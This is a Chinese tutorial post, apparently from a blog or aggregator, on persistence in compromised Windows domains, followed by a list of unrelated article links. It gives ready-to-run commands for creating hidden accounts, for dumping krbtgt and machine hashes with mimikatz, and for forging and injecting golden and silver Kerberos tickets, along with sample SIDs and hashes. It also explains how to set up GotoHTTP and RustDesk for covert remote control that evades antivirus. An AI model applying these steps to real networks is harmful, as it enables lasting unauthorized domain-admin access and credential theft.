当前位置：首页 > news >正文

内网渗透之权限维持-黄金白银票据隐藏账户远控-RustDeskGotoHTTP

news 2025/9/23 21:09:04

0x01权限维持-隐藏用户

CreateHiddenAccount工具

CreateHiddenAccount -u test -p P@sswrd

用户管理能查看到，命令查看看不到，单机版无法删除(不在任何组)，域环境(在administrator组中)可以删除
在这里插入图片描述

0x02权限维持-黄金白银票据

⻩⾦票据⽣成攻击，是⽣成有效的TGT Kerberos票据，并且不受TGT⽣命周期的影响（TGT默认10⼩时，最多续订7天），这⾥可以为任意⽤户⽣成⻩⾦票据，然后为域管理员⽣成TGT，这样普通⽤户就可以变成域管理员。
白银票据（SILVER TICKET）是利用域的服务账户进行伪造的ST，在Kerberos认证的第三步，Client带着ST和Authenticator3向Server上的某个服务进行请求，Server接收到Client的请求之后，通过自己的Master Key 解密ST，从而获得 Session Key。所以只需要知道Server用户的Hash就可以伪造出一个ST，且不会经过KDC，但是伪造的门票只对部分服务起作用（不需要交互KDC，需要知道Server的NTLM Hash）。

一、黄金票据
利用条件：
1.已经拿下域管理员，获取到krbtgt hash
2.利用krbtgt的hash制作黄金票据工具，进行攻击
利用：
1.获取域的sid值，最后4位不要 S-1-5-21-1218902331-2157346161-1782232778

whoami /user
whoami /all
wmic useraccount get name,sid

在这里插入图片描述
2.域的KRBTGT账户NTLM-HASH：b097d7ed97495408e1537f706c357fc5

mimikatz privilege::debug
mimikatz lsadump::lsa /patch

在这里插入图片描述
3.伪造用户名：dbadmin（任意用户名）
生成票据：
mimikatz kerberos::golden /user:dbadmin /domain:god.org /sid:S-1-5-21-1218902331-2157346161-1782232778 /krbtgt:b097d7ed97495408e1537f706c357fc5 /ticket:g

导入内存

mimikatz kerberos::ptt g

在这里插入图片描述
访问测试：

dir \\owa2010cn-god\c$

在这里插入图片描述
黄金票据总结：
该攻击⽅式其实是⼀种后⻔的形式，属于第⼆次进⾏攻击的⽅法。
第⼀次拿到域管权限之后，需要将krbtgt NTLM hash进⾏保存，当第⼆次再来进⾏域渗透攻击时，我们就可使⽤krbtgt的NTLM hash制作⻩⾦票据，从⽽再次获得域管权限。

二、白银票据
1.已经拿下域管理员，获取到DC hash
2.利用DC的hash制作白银票据工具，进行攻击
利用：
1.获取域的sid值，最后4位不要 S-1-5-21-1218902331-2157346161-1782232778

whoami /user
whoami /all
wmic useraccount get name,sid

2.域DC账户NTLM-HASH bfe8cf6709038dd075d4cb5553b56412

mimikatz privilege::debug
mimikatz sekurlsa::logonpasswords

在这里插入图片描述

3.伪造用户名：dbbadmin（任意用户名）
导入票据：（CIFS文件共享服务）
domain：域名
sid：域环境下的SID，除去最后-的部分剩下的内容
target：要访问的服务器，写FQDN
rc4：写的是目标主机的NTLM（主机名$对应NTLM）
service：要访问的资源类型
user：伪造的用户
cifs：共享文件

mimikatz kerberos::golden /user:dbadmin /domain:god.org /sid:S-1-5-21-1218902331-2157346161-1782232778 /target:owa2010cn-god /service:cifs /rc4:bfe8cf6709038dd075d4cb5553b56412 /ptt

在这里插入图片描述
失败了

白银票据总结
1.伪造的ST，只能访问指定的服务，如CIFS；
2.不与KDC交互，直接访问Server；
3.ST由服务账号 NTLM Hash 加密。

#权限维持-远控软件-GotoHTTP&RustDesk
一、GotoHTTP
利用场景：有网络下，需要绕过杀毒等网络防护
B2C模式，无需安装控制端软件，有浏览器就可以远控。
流量走https协议，只要目标放行443端口出口就可以实现内网穿透。
二、 RustDesk
利用场景：无需网络，需要绕过杀毒等网络防护
1、有网连接：
C:\Users\用户名\AppData\Roaming\RustDesk\config
其中ID和密码在RustDesk.toml文件里。
在这里插入图片描述
连接：

2、无网内网连接：IP直连
注意权限问题，最好以管理员打开，这样才能创建监听端口，或使用已开启监听的端口
RustDesk2.toml

direct-server = 'Y'
direct-access-port = '8443'

在这里插入图片描述

内网渗透之权限维持-黄金白银票据隐藏账户远控-RustDeskGotoHTTP

0x01权限维持-隐藏用户

0x02权限维持-黄金白银票据

相关文章：

内网渗透之权限维持-黄金白银票据隐藏账户远控-RustDeskGotoHTTP

动态规划——带权活动选择

软考A计划-真题-分类精讲汇总-第十八章(面向对象程序设计)

【C++ 入坑指南】（09）数组

Vue.js

博士毕业答辩流程注意事项

拼多多开放平台订单详情接口解析

如何把ipa文件(iOS安装包)安装到iPhone手机上? 附方法汇总

由浅入深了解深度神经网络优化算法

LIN-报文结构

南京邮电大学通达学院2023c++实验报告（三）

ISO9000和ISO9001有哪些区别?

第7章异常、断言和曰志

springboot读取和写入csv文件数据

【产品经理】工作交接

Springer期刊 latex投稿经验分享

Python 文件读取的练习

Redis:主从复制_通过此功能实现对内存上的数据更好的保护

LoRA:大模型的低秩自适应微调模型

拼多多买家如何导出“个人中心”订单信息

AI-调查研究-01-正念冥想有用吗？对健康的影响及科学指南

React hook之useRef

oracle与MySQL数据库之间数据同步的技术要点

python报错No module named ‘tensorflow.keras‘

HarmonyOS运动开发：如何用mpchart绘制运动配速图表

uniapp 开发ios， xcode 提交app store connect 和 testflight内测

Spring AOP代理对象生成原理

MySQL体系架构解析（三）：MySQL目录与启动配置全解析

从实验室到产业：IndexTTS 在六大核心场景的落地实践

Linux系统：进程间通信-匿名与命名管道